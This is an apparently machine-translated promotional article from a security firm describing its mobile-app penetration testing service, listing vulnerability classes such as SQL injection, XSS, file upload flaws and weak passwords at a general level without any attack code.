Shulou(Shulou.com)06/01 Report--

At present, more and more APP have been attacked by hackers, including the database has been tampered with, the user data in APP has been leaked, the mobile phone number, name, password and data have been stolen, and the bank card, recharge channel and aggregate payment interface of APP on many platforms have also been modified by hackers, resulting in too much economic loss for APP operators. Many of them find our SINE security company through the introduction of old customers to seek security protection and prevent attacks. According to our SINESAFE network security practice in the past ten years, Most websites and apps are attacked because of vulnerabilities in website code and server system vulnerabilities, including vulnerabilities in installed server software. About APP penetration test content, and how to prevent APP from being attacked, we summarize an article to share with you, hoping to help more people in need.

At present, the overall APP security penetration in 2020 is more and more recognized in the industry. Many customers will first think of finding security solutions after being attacked, seeking penetration testing companies, website security companies and network security companies to help solve the attack problem. This is a normal security requirement. At present, more and more customers are following this idea. We talk about professional terms to analyze APP security and penetration testing. In fact, APP is divided into 2 points for vulnerability detection. IOS system is currently very closed, relatively safe, Android Android security is too poor, more vulnerabilities, most penetration tests are based on Android platform, APP penetration test content is as follows:

APP interface security penetration is also called API interface penetration, HTTPS is not only used by large platforms, mall systems, more apps and websites are using HTTPS encryption SSL transmission, including now IOS9.0 version or above have been forced to use HTTPS access, interface encryption algorithm penetration, and reverse cracking is necessary, including now many Android and Apple are using an encryption algorithm, including AES,+RSA algorithm special encryption. That is to say, APP communication encryption can be multi-layered, the first layer is HTTPS, the second layer is AES encryption algorithm communication encryption, using the secret key to encrypt some special data transmission, to prevent eavesdropping, in the penetration test will also crack and reverse the encryption algorithm, to see if you can get the secret key for decryption operation.

APK, DEX file security verification penetration, test whether the package can be decompiled, and whether the data and configuration files in the package can be reverse cracked to view, some customer APP is decompiled to cause the APP implanted Trojan backdoor repackaged online for users to download, resulting in many people's mobile phone Trojan backdoor, and even steal the user's APP platform account password, here we recommend customers to APK, DEX package MD5, CRC32 algorithm verification signature.

Another penetration test content is anti-dynamic injection, dynamic process call and injection detection of APP, test whether data packets can be used for injection, tampering with APP data, including post data, etc., normal we security reinforcement will write process view in APP, check whether there are hook tools and malicious software, if there is direct shutdown APP, including IP proxy access APP detection, if there is direct shutdown software.

The next step is the security penetration test of most APP embedded website code. At present, most APP of mobile Internet are carried out in web mode, that is to say, APP penetration test also includes Website Penetration Test (Test). The service contents are as follows:

Overstepping vulnerability: detect whether the functions in the APP platform have unauthorized operation, view, edit user information, etc., for example, ordinary users can use the administrator's permission to view any user's information, including contact information, mobile phone number, bank card and other information, and modify the avatar of other accounts.

File upload vulnerability, detect APP avatar upload, and message feedback can upload pictures in the function whether there is a file format vulnerability can bypass, upload PHP, JAVA, JSP, WAR and other Trojan files to the APP directory.

SMS theft vulnerability: in the user's registration, password recovery, set secondary password, modify bank card and other important operations to obtain mobile phone SMS Captcha function whether there is SMS sent many times, repeated sending, 1 minute does not limit the number of times sent vulnerability detection and penetration test.

SQL injection vulnerability: malicious SQL injection code can be implanted into APP in APP user login, recharge page, modify bank card, submit message feedback, commodity purchase, cash withdrawal function, and sent to back-end database server for query, write, delete and other SQL operation penetration detection.

Sensitive information disclosure vulnerability: Some APP do not encrypt the content returned by submission, resulting in the returned data containing user information, account number and password, which are displayed in plain text. By modifying the ID value, you can view the information of other members arbitrarily.

XSS cross-site vulnerability: Some APP feedback, avatar upload address function can insert XSS cross-site code, causing the background administrator to view the message can trigger XSS cross-site attack, resulting in the background login address, COOKIS are obtained by the attacker.

Weak password vulnerabilities, including the root account password of the server, as well as redis password, website background administrator account password may exist weak password, such as 123456.admin, admin8888 and so on are weak passwords, this aspect is also the need for penetration testing.

The above is the content of APP penetration test service, which is generally these. When we carry out APP penetration test on customers, SINE Security will carry out security test on the above projects. APP vulnerability detection will help customers find loopholes and avoid major economic losses due to later development. Security is not absolute. We can only do our best to maximize security and know each other. Only by truly understanding our own APP and existing loopholes can we do a good job in security. Do the ultimate, if your APP is attacked by hackers do not know how to solve, you can find our SINE security penetration test service, find the source of the attack vulnerability, fix the vulnerability, the APP security reinforcement and protection, to prevent the later attack, the loss will be reduced to a minimum.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.